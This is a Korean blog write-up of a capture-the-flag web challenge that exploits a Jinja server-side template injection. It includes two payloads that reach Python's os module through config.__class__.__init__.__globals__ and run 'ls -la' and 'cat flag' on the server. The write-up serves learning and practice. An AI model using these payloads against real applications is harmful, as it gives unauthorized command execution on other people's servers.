[h4ckingga.me] Simple Calculator
http://web.h4ckingga.me:10000/
Simple Calculator
web.h4ckingga.me:10000
SSTI 문제로, 파이썬의 jinja 템플릿의 취약점을 이용한 문제이다.
사이트로 들어가보면
간단하게 입력값을 받고 그 결과를 출력해주는 구조인듯
여기에 2*2를 쳐 보았다.
2 * 2가 아니라 계산된 값인 4가 나오는 것을 확인할 수 있다. (<- ssti 취약점)
config를 쳐 보자.
민감한 시스템 명령어에 대한 필터링이 딱히 없는듯...?
아래 명령어를 쳐서 서버에 존재하는 파일들의 정보를 찾아보자.
config.__class__.__init__.__globals__['os'].popen('ls -la').read()
시스템 명령어에 대한 필터링이 없는 탓인지 바로 서버에 존재하는 파일 경로들을 출력하고 있다.
세번째 줄을 보면 flag 파일에 대한 정보가 보이는데, flag 파일은 현재 내가 위치하는 서버 파일과 동일한 경로에 있다는 것을 알 수 있다.
cat 명령어로 바로 파일 내용을 출력해보자
config.__class__.__init__.__globals__['os'].popen('cat flag').read()
'보안 > Web hacking' 카테고리의 다른 글
| [Dreamhack] Relative Path Overwrite Advanced (0) | 2025.01.19 |
|---|---|
| [Dreamhack] access-log (0) | 2025.01.11 |
| [Dreamhack] LiteBoard (0) | 2025.01.04 |
| [Dreamhack] Safe Input (0) | 2025.01.02 |
| [Dreamhack] insane python (0) | 2024.12.26 |
![[Dreamhack] Relative Path Overwrite Advanced](http://img1.daumcdn.net/thumb/C300x300/?fname=https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FPoG55%2FbtsLSBNnfs1%2FRWywFqRvJFxPplXuKblHwK%2Fimg.png)
![[Dreamhack] access-log](http://img1.daumcdn.net/thumb/C300x300/?fname=https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fs6fnQ%2FbtsLKtBSky8%2FO4mApBdrQufTymrVbYKZEK%2Fimg.png)
![[Dreamhack] LiteBoard](http://img1.daumcdn.net/thumb/C300x300/?fname=https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdpkt4b%2FbtsLFfJF1Xt%2FxdTbl02NcBHIsSbLujTYf1%2Fimg.jpg)
![[Dreamhack] Safe Input](http://img1.daumcdn.net/thumb/C300x300/?fname=https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbhK8zm%2FbtsLD1Y6Bqm%2FVcfy9kTEudq0cT7dDStLSk%2Fimg.jpg)